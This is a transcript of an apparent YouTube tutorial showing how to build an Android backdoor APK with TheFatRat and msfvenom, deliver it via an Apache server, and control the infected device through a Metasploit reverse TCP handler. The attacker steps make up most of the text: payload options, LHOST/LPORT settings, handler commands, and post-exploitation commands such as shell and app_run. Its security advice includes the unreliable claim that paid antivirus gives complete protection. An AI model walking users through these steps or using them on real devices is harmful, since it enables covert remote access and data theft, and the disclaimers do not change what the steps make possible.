Hey guys, welcome back into this channel. So in today's video, I will show you how hackers create and use a backdoor to gain remote access to a victim devices using tools like the fat rat and the Metasploit. But please, before we dive into this particular video, let's remember that this video is strictly meant for educational purposes only. Do not use this method on anyone without an permission. So with no more delay, let's dive into this video. So first thing we're going to be talking about right now is to know what a backdoor is. Alright, so when we're talking about backdoor is a security bypass mechanism that allow unauthorized access to a computer or network devices. So anytime that we want to bypass a security authentication on a network or a computer devices, that is where a backdoor comes in. So when you're talking about this backdoor is used by attackers to gain control or steal data silently. So when a bad guy wants to gain a control onto your devices or he wants to steal your data silently without you know about it, they make use of what they call backdoor. So how does this backdoor work? This backdoor here is often installed through a malicious software, which is what we call a malware or fake application. It can connect back to hackers using reverse shell. So for example, using what we call a Metasploit. So this backdoor can make a reverse connections to a bad guy, so in a way that they will be able to have access into your sensitive information. So when we're talking about this backdoor, we have different types of backdoors. So the first one here is what we call the malicious backdoors. So malicious backdoors is a type of backdoor that is created by hackers to have unauthorized access or bypass security authentication. So when a bad guy wants to have an unauthorized access into your network, your security devices, they make use of what we call a malicious backdoor. So just put it in mind that when we're talking about this malicious backdoor, this is type of backdoor that is created by hackers to gain unauthorized or to bypass the security authentication on your network. So the second type of backdoors that we have here is what we call built-in backdoors. Okay, so when you're talking about these built-in backdoors, these backdoors sometimes created by a software developer. So this type of backdoor is created by a software developer, is not created for malicious activities. Is either the software developer created it intentionally or by mistake. But put it in mind, but this type of backdoor is not created for a malicious activities. Okay, so the third type of backdoor is what we know is a firmware or hardware backdoor. So when you're talking about this firmware and hardware backdoor, this usually found inside a router. So those are the type of backdoor you can see inside a router, inside the cameras and so on. So all those type of backdoor is what we call hardware backdoor or firmware backdoor. Okay, so the tools that we're going to be using inside the demonstration. So I have different tools that we use. The first one here is the fat rat. So the fat rat tool, what are we using it for? We are using it for a payload generation. So we use it to create the backdoor payload. So in a way to use it on the victim system. And the second tools we're using here is a Metasploit. So this Metasploit is to receive the backdoor section. We use it to exploit, so you receive the backdoor section. And the third tools I'm using inside this demonstration is a Android emulator. So actually this Android emulation is for testing the payload safely. Like what I explained to you, this demonstration here we are using it strictly on our own lab, so you shouldn't use it on any other person that you don't have the right or permission. So these three tools here are the three tools that are used to perform this demonstration. Okay, so how can we secure ourselves from this type of malware, which is what we call backdoor? So the first thing here, never install unknown application or software. So any application that you don't know or any software you don't know, make sure that you don't install it on your system. And before you can install any software, any application, make sure that you are installing all those application and software from a trusted vendor. So like if you are using Android, make sure you are installing any application from Play Store. If you are using Apple, make sure like iPhone, make sure you are installing any application from Apple Store. Okay, so the second one says use a trusted antivirus and a firewall. So make sure that you use a trusted antivirus and firewall on your system, on your devices, so that anytime that we have a malware called Backdoor, all those guys they will be flagging and they will be detecting all those software. When you're talking about a trusted antivirus can be antivirus that you paid, that you subscribe for. You know, we have different type of antivirus nowadays that you can just install inside your system. You can be using freely. So all those type of antivirus are not trusted. So make sure you are getting a subscribed antivirus that's going to be secure your devices 100%. So the next thing is to keep your OS, which is your operating system, and your application. Make sure that all those operating system and the application that is running on your devices, on your phone, make sure that they are up to date. Anything you are using on your devices on your phone, make sure that you update them to the latest version. And the next one here says you should monitor unusual network activities. So make sure that you monitor your devices for unusual activities so that you'll be able to know if there's a malicious software on your network. So with no more delay, let's dive in into how to create this particular demonstration. So what I'm going to do is this, I'm going to open the attacker machine that we're going to be using. So here I have my Kali here. This Kali here is going to be acting as an attacker machine. Okay, so what I'm going to do is to open the terminal of this Kali. So once I open the terminal of this Kali, so all I just need to do is to check what the IP address of the Kali is. So if I type if config and I hit enter key, so you're going to see that this is the IP address of the Kali. Alright, so the next thing is to check if there is an internet on this Kali by pinging any website. So I can ping google.com. Anytime I ping google.com, if this reply is if I'm not getting a reply, that means that there's no internet. So I need to make sure that I'm getting a reply before I start the class. So I'm going to disconnect and I'm going to connect to my network back. So if I try to ping google.com, as you can see, I'm getting a reply right away. So I'm going to use Ctrl Z to stop, Ctrl L to clear, or else I'm going to be pinging forever. So what I'm going to do is this is to open the tools that we're going to be using, which is the fat rat. So how am I going to open the tools? First thing I need to do is to go into my root. I already installed this particular tool, so I'm going to enter my root. Asking for password, I'm going to choose the password. Okay, so if I list whatever I have in my roots, if I list ls, so you're going to see that we have fat rat. We have a fat rat, but what I'm going to do is this to go to my home by using cd. Hold on. So I'm going to enter cd /home /Kali. So I need to go to my home. So if I type ls, so you're going to see the fat rat. Already installed the fat rat on my system. So I'm going to make another video on how you can install this fat rat. So once I install this fat rat, for me to make use of this fat rat, I'm just going to do cd. I'm going to enter this particular folder. I paste and I hit enter key. So once I paste and I hit enter key, I'm inside the folder. If I list whatever it's inside. So you're going to see a lot of tools here. So for me to launch these tools, but make sure that you already have these tools like what I explained to you. So if you don't have these tools, it's going to be difficult for you to bring up that particular tools. Okay, so for me to launch these tools, what I'm going to do is this, is to use this command here. Alright, so for me to launch this particular tools, I'm going to type fatrat and I'm going to hit enter key. So once I type fatrat, I'm going to hold on a little bit for it to come up. So as you can see, the tools is coming up. So I need to hold on for it to come up. Alright, so I need to hold on. I'm going to hit enter key to continue. So I'm going to hit enter key to continue. Going to hit enter key again. Alright, so when we come up, the tools is already up. So here you see that we have a different options. So what I'm going to go for here is I'm going to choose number one to create backdoor with msfvenom. So I'm going to type one. I hit enter key. So when I hit enter key, you're going to see that we have different options. We have the one for Linux, Windows, Android, Mac, and all the stuff. So what I'm going for here is for Android. So I'm going to choose three, which is for Android. So once I choose three, I need to sell the L host. I need to set the L host to set the L port wherever I want. So how am I going to set the L host? L host here stands for my local host. So if I want to get what my local host is, I open my another terminal. So if I open another terminal, I'm going to type if config, which is the interface configuration. You can see here is my IP 172.20.10.3. So I go back to this guy. So I'm going to set lhost as 172.20.10.3. I hit enter key. So I can actually set the output as well. I'm going to set the output. I'm going to type set output. So you can use any port number of your choice. I'm going to use 4444. I hit enter key. So once I hit enter key, the next thing going to be asking me for the name of that particular output I want to name the malware. So I'm going to name it backdoor. So I'm going to name it backdoor.apk and I hit enter key. Alright, so once I name it backdoor.apk, it's going to ask me that which one did I want to use out of all these payload options. Actually, I can use any other one that you want, but I'm going to go for number three, which is a Android Metasploit reverse underscore TCP. So I'm going to choose three and I hit enter key. So once I choose three, I hit enter key, you're going to see that it's going to bring all those things outside. It's going to be creating that particular payload. So we need to hold on a little bit. So we hold on a little bit until it's been created. So we're going to hold on a little bit to create it. So if I come, hold on, I think there's a little mistake. I put number one. I choose number three and I set L hosts as 172.20.10.3. I set L port as 4444 and I name it backdoor.apk and I hit enter key. I choose the three. So it's supposed to create a malware for us. So let's hold on, let's see what's going on over here. Hold on, hold on. I think there's a little mistake. So if I Control Z to stop, so I want to check the error before we start. Google.com. Okay, Control Z. So if I type Control Alt, if I open the tools again, so I'm going to open the tools again to check where the error is. Alright, so let's hold on for it to come up. When to hit enter key to continue, hit enter key again. So I'm going to create a backdoor with msfvenom. Use number 3. I can set help host hellos 172.20.10.3 set. So I'm going to set L port. So I'm going to set L port at 4444. I'm going to name it backdoor.apk. So we have different options. I can actually use 100 meter reverse underscore https. So if I go for number 2, so let's hold on for it to create the malware. Alright, so once the malware is bequeathed, so if I type ls, I'm going to see the backdoor here, which is the backdoor we just created right away. So what we need to do is to put this backdoor here in online, so that we're going to make sure that this particular payload enter that particular victim. So how do we go about it? So I'm going to do it like this. CP. And before I enter CP, I need to enable a web server on this particular card by using service. I'm going to be using service Apache 2 start to turn on Apache server on the Kali. So I hold on a little bit for it to come up. So once it's up, I'm going to use CP. I'm going to copy this particular application here, which is the backdoor. I'm going to copy it and I'm going to paste it to this particular directory, which is where the website is turned on the Kali. HTML. I'm going to hit enter key. So what I hit enter key, what I need to do is to enter the victim. I'm just going to open the Chrome in this victim here, which is the Android. So once you open the Chrome, so what I need to do here is to put the IP address of the Kali 172.20.10.3 / the name of that particular payload, which is a backdoor, which is backdoor.apk. We hit enter key. So you're going to see that this particular software is being installed. So if you click on open, click on next, install, you're going to see that particular software. So if I click on done, so I'm going to close it. So I'm going to close it. I'm going to close this as well. So I want to bring out that particular software on this Android. So if I open this media, I goes to it, you're going to see it here, backdoor APK. So to launch this particular attack to exploit, so I'm going to launch MSF console. So we hold on for MSF console to come up. So we wait for MSF console to come up. So let's hold on a little bit for this guy to come up. So we need to see MSF6 here, which is a Metasploit framework version 6. So we hold on for it. If it's not up yet, I think my system is kind of slow a little bit. So let's wait a little bit for the tools to come up. Okay, so once this guy here is up, what I'm going to do here is this, is to use, so we're just going to type, sorry for it. So I've typed a lot of command here, so let's just wait for it to come into the normal point. So I'm going to type use multi, so use multi handler. So we're going to be using multi handler, use multi handler. I'm going to hit enter key. So let's wait for it to come. Okay, so after that, I'm going to set the payload. I'm going to set the payload as a 100 forward slash meter forward slash reverse underscore TCP, reverse underscore TCP, which is what we use to generate a particular payload. So after that one, I'm going to set the L host. L host will be the IP address of the Kali 20.10.3, 172.20.10.10.3. I'm going to hit enter key. So the next thing is to set the L port. L port will be the port number we're using over there, 4444. I hit enter key and I'm going to type exploit. Is either you type exploit or you type run. So I'm going to type exploit. We hit enter key. So if I come to this Windows 10, if we interact with this malware here, which is the payload, so we're going to interact with it. I think we already installed it. So what you just need to do is to double click on it. So if I come to this guy here, it should come up. Okay, so you can see that one session is open. It means that we are inside that particular victim. So how can we know? So if I type sys info, I hit enter key, you're going to see that we are inside 100, which is that particular victim. I'm going to type get, you can type get UID, get UID, which is a get user identity. This is the name of the user that is inside this particular 100. Okay, so what are we doing? We have a lot of things that we can do inside this place. But if you don't know, if I type something like this, you can see that if you type shell, you're already inside the terminal of that particular Windows 10. You are inside the terminal. So like if I type ls, let me use Ctrl Z to come back to my meter. So for example, if you type F, you have a different command you can use over here. Just like let's test this command here, screenshot. So this screenshot is screenshot the victim. So if I type screenshot, Here say no screenshot were returned. It cannot take a screenshot. This payload was telling am without user interface. Okay, so let's check another stuff that we can use to get a lot of information on the particular victim. So that's what we're going to. Alright, so once you hear, alright, so once you hear, so once you are able to see Metasploit, that means that you already make a reverse connection to the victim. So if I type help here is going to show you all the command that you can use. So if I scroll up a little bit, so you can see all the command that you can use to get the information to have access to the victim. So here is all the commands that you can use. These are all the command you can use. You can scroll down, so you're going to see all the commands. So if I scroll down, if you want to set SMS, you can set SMS. If you want to restore, you want to list, you want to run a particular application, you can run it. So for example, if I come to this guy here, I don't think that I have an application. So let me check. Application called Backdoor APK. So I have a Backdoor APK. So if I come here, so for example, let's try to run it and let's see. So if I come to the here and I paste the command, so let's try to run backdoor.apk, which is the application that we have. Sorry. So if I try to see apk run, I don't think this guy is installed yet. So if I come to, I don't think there's a Chrome. So let's check this. So this is supposed to work. Maybe I type Chrome, supposed to work. App underscore run to start me out with a package name. That's supposed to run app list. So if I type app list, app underscore list, yeah, you're going to see all the application running on this particular victim here. Yes. So you're going to see the application running on it. So you see different application. Okay. So what I'm going to do here is to open one. So let's assume that I want to open Google Play Store. I'm going to copy. So if I type app run, so if I paste this thing here, sorry, if I paste this thing, I copy here and I hit enter key, it's supposed to run this particular application. It's supposed to run this particular application. So this is supposed to run it. Hold on a little bit. So this is supposed to run this Google Play Store. Google Play Store. App run space. Yes, if you come here, you will see. Sorry guys, I think I do a little mistake. So if I want to run this Google Play Store here, if you see, for example, I comes to the Android, is already launched. But if I close it, what you need to do is to come over here, just type app underscore list and I hit enter key. You're going to see all the application running on this particular Android. So I have a Google Play Store. This is the name. I need to copy this particular guy here. I copy it. So if I copy, I need to say app underscore run, and I paste that particular application I want to run, which is Google Play Store. So if I come to the Android, you will see that it's already launched. So what if I want to launch another application? Just like I want to launch a user dictionary, I'm going to come over here. I'm going to copy and I'm going to say app underscore run, and I'm going to paste and hit enter key. Okay, there's no dictionary app. So let me open the settings. So for example, if I want to open the settings, I copy. I'm going to say app underscore run, and I paste the settings and I hit enter key. This should open the settings on the victim. This should open the settings on the victim. So if I come back here, sorry. So if I come on back here, this open. Okay, yeah, that is not a application. So let me open another application. Like if I open Google Play game, let's check this. Copy. Let's check this. So if I cancel this and I try to paste and I hit enter key, this I come to the victim, you're going to see that it's opened the particular game. So this is how a bad guy can have access into your system by using a backdoor. So like what I explained to you, actually this video here is made for educational purpose. You don't use it against someone that you don't have access. And if you are new into this channel, please don't forget to like, share, subscribe, and turn on a notification button so that anytime that we drop a video like this, you will be among those people that's going to be the first person to have access to this video. Okay, so make sure that you use this particular video on your own lab. Whereas play, don't use it on any other person that don't have the permission. So bye for now and see you later in the next presentation.